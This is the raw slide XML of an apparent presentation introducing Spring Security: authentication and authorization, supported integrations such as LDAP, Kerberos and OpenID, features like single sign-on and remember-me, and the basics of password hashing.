              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Certificate Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Spring Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42144305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Spring framework has two major applications which are authentication and authorization. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is a process of identifying and knowing the target user which wants to access the application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is a process of allowing the authority to perform some actions in the application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apply authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to a web request, methods and access to an individual domain.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Spring Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3791219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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Security supports integration with all of these technologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BASIC authentication headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Digest authentication headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP X.509 client certificate exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lighweight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Directory Access Protocol)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Form-based authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t> Spring Security Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1823615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574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatic remember-me authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JOSSO (Java Open Source Single Sign-On)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AppFuse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AndroMDA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mule ESB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DWR(Direct Web Request)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t> Spring Security Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13754586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Configuration support to Java Programming Language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Portable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comprehensive support to tasks like authorization and authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Servlet API integration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring MVC integration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection against some common tasks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Advantages of Spring Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38135045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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP (Lightweight Directory Access Protocol)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Single sign-on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JAAS (Java Authentication and Authorization Service) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LoginModule</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic Access Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digest Access Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember-me</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Spring Security Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12077965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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Form Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Localization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Spring Security Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11932125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fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Spring Security Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Spring Security Tutorial Step By Step - Example &amp;amp; Advant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1" y="1676400"/>
            <a:ext cx="8153400" cy="426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086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LDAP (Lightweight Directory Access Protocol)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is an open application protocol for maintaining and accessing distributed directory information services over an Internet Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Single sign-on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This feature allows a user to access multiple applications with the help of single account(user name and password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JAAS (Java Authentication and Authorization Service) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LoginModule</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is a Pluggable Authentication Module implemented in Java. Spring Security supports it for its authentication process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Spring Security Features</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2565891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smtClean="0"/>
              <a:t>Password Hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>algorithms are one way functions. They turn any amount of data into a fixed-length "fingerprint" that cannot be reversed. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>also have the property that if the input changes by even a tiny bit, the resulting hash is completely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>different.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is great for protecting passwords, because we want to store passwords in a form that protects them even if the password file itself is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at the same time, we need to be able to verify that a user's password is correct.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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4062755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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic Access Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Security supports Basic Access Authentication that is used to provide user name and password while making request over the network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
